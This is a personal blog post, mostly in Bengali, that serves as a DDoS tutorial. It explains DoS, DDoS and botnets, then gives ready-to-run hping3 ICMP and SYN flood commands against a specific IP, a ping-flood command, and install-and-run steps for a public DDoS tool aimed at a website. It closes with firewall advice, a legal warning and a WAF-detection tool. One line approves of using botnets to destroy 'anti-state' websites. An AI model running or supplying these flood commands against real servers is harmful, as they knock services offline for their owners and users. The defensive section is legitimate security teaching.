Personal Blog of

Minhazul Asif

Personal Blog of

Minhazul Asif

DDOS Ping ICMP Flood & DDOS SYN Flood Attack

DDoS (ডিডস) কাকে বলে?

 

ডিস্ট্রিবিউটেড ডিনায়েল অফ সার্ভিস বা ডিডস হলো মাল্টিপল ডিভাইস ইউজ করে একটি সেম টার্গেটে অ্যাটাক করা। ডস অ্যাটাক যেখানে একটি সিস্টেম ইউজ করে করা হয় কিংবা একজন হ্যাকার কাজটি করে, সেখানে ডিডস অ্যাটাকে অনেকগুলো ডিভাইস ইউজ করা হয়, বা কয়েকজন হ্যাকার মিলে কাজটা করে।
ধরুন আপনার একটি Business ওয়েবসাইট আছে। সেখানে আপনি বিভিন্ন পণ্য/সেবা বিক্রি করেন এবং অনেক কাস্টমার আপনার এই সার্ভিস ইউজ করে। এ কারনে উক্ত ওয়েবসাইট পরিচালনার জন্য আপনি অনেক বেশি স্পেস এবং ব্যান্ডউইথ সহ হোস্টিং কিনলেন। কোন কারনে আপনার ওয়েবসাইট কোন হ্যাকারের খারাপ নজরে এলো। সে যদি আপনার ওয়েবসাইট স্লো বা অফলাইন করে দিতে চায় তাহলে তাকে ডিডস অ্যাটাকের সাহায্য নিতে হবে। আর এভাবে ওয়েবসাইটটির ব্যান্ডউইথ নষ্ট করে দিয়ে ওয়েবসাইটটিকে সার্ভার থেকে বিচ্ছিন্ন করে ফেলে এবং কেউ ওয়েবসাইটটিতে আর ভিজিট করতে পারেনা।

DoS/ DDos (ডিডস) কি?

 

BotNet/ বটনেট “ জম্বি নেটওয়ার্ক”?

 

এটা করার জন্য হ্যাকাররা বটনেট বা জম্বি নেটওয়ার্ক ব্যবহার করে, যার মাধ্যমে সহজেই একটি সার্ভারে অনেক সংখ্যক রিকোয়েস্ট পাঠানো যায়, জমি নেটওয়ার্ক একটি Infected ম্যালওয়্যার। বটনেট কনফিগারেশনের কারনে হ্যাকার রিমোটলি টার্গেট সেট করে উক্ত ডিভাইসকে আর্মি হিসেবে ইউজ করতে পারে।
তবে, সিঙ্গেল অ্যাটাকের থেকে বটনেট ইউজ করে অ্যাটাক পরিচালনা করলে একই সাথে গিগাবাইট থেকে টেরাবাইট ইন্টারনেট ট্র্যাফিক সেন্ড করা সম্ভব, যা ওয়েবসাইটের সমস্ত ব্যান্ডউইথ কে নষ্ট করে দিতে পারে। এধরণের শক্তিশালী অ্যাটাক প্রতিহত করাও অনেক কষ্টকর এবং ব্যায়বহুল হয়ে থাকে। বট নেট দিয়ে সমাজ/ রাষ্ট্র বিরোধী ওয়েবসাইটগুলো সহজে ধ্বংস করা যায়।

DoS/ DDos (ডিডস) কি?

 

Before Attack Check Server Response Time

 

let’s check server response time : kali(cmd) ping www.minhazulasif.me

ping

 

DDOS Ping ICMP FLOOD – Attck a Server USing hPing3

 

sudo hping3 -1 –flood 148.163.80.131

Try overwhelmed the server with multiple request and see the server response time

 

DDOS SYN FLOOD ATTACK

 

– Using TCP we connect with a server (say port is 80)

tcp handshake

sudo hping3 -d 200 –flood 148.163.80.131

hping

– d = packet (byte) –flood = huge request, p = port

Ping Of Death

 

> nslookup www.targetdomain.com
> get the ip address
> ping ip -t -n 10000 -w 1

 

Terms:
-t = Pings the specified host until stopped.
-l = buffer size
-n = Count Number of echo requests
-w 1 = wait of second for each reply

 

DDos Attack In Kali (RDDoS_Tool)

 

Github Link: https://github.com/Red-company/RDDoS_Tool

apt-get update -y
apt-get install git
git clone https://github.com/Red-company/RDDoS_Tool.git
cd RDDoS_Tool
bash setup.sh
python3 RDDoS_Tool.py

 

If there are troubles :
pip install tqdm
pip install pyfiglet

Then choose 1 for website attack & put the domain name

RDDoS

 

কিভাবে ডস বা ডিডস অ্যাটাক থেকে সুরক্ষিত থাকা যায়?


ডিডস অ্যাটাক থেকে সুরক্ষা পেতে অনেক গুলো পেইড এবং স্ট্রং ফায়ারওয়াল ব্যবহার করতে হবে। ছোট এবং মাঝারী অ্যাটাক প্রতিহত করার জন্য ফায়ারওয়াল সার্ভিস অনেক কার্যকর।
ফায়ারওয়াল এর মাধ্যমে, সিস্টেম থেকে অতিরিক্ত রিকোয়েস্ট বা ট্র্যাফিক আসতেছে তা সহজেই বের করা যায়। উক্ত আইপি ব্লক করে দিলেই অ্যাটাক বন্ধ হয়ে যায়। আর অনেকগুলো হ্যাকার যখন নির্দিষ্ট একটি নেটওয়ার্কে অ্যাটাক করে তখন সেই হ্যাকারদের লোকেশন বা কান্ট্রি ব্লক করে দিলে এই ধরনের অ্যাটাক থেকে সুরক্ষিত থাকা যায়।

এছাড়া বড় ধরনের অ্যাটাক প্রতিহত করার জন্য ক্লাউড নির্ভর সার্ভিস যেমন Cloudflare, Sucuri firewall, AWS Shield, Project Shield, Wordfence ইত্যাদি অনেক ভালো কাজ করে। সুতরাং ডিডস অ্যাটাক থেকে আপনার সার্ভিসকে সুরক্ষা দিতে চাইলে এসব সার্ভিস অবশ্যই ব্যবহার করবেন।
DDoS অ্যাটাক অবশ্য একটি শাস্তিযোগ্য অপরাধ, আমরা সবাই DDoS অ্যাটাক সম্পর্কে জানবো এবং নিজেদের সুরক্ষা নিশ্চিত করবো। কারো ক্ষতির জন্য এটি ব্যবহার করব না।

 

Check Firewall/ WAF exist in a site or not

 

in kali > wafw00f
> wafw00f -l (To see the waf list)
> wafw00f minhazulasif.me (To check filewall exist or not)

waf

 

Read more bloghs on ethical hacking from here.

Share on -

Related Articles

Minhazul Asif

আমি মিনহাজুল আসিফ,

Entrepreneur, Instructor, Web Developer, Freelancer & Cyber Sucurity Expert.

নিজের আইডিয়া গুলো সবার সাথে শেয়ার করার জন্য এই ব্লগ ওয়েবসাইট তৈরী করা। আশা করি আমার ব্লগ পড়ে অনেকেই উপকৃত হবে।

ক্যাটাগরি সমূহ: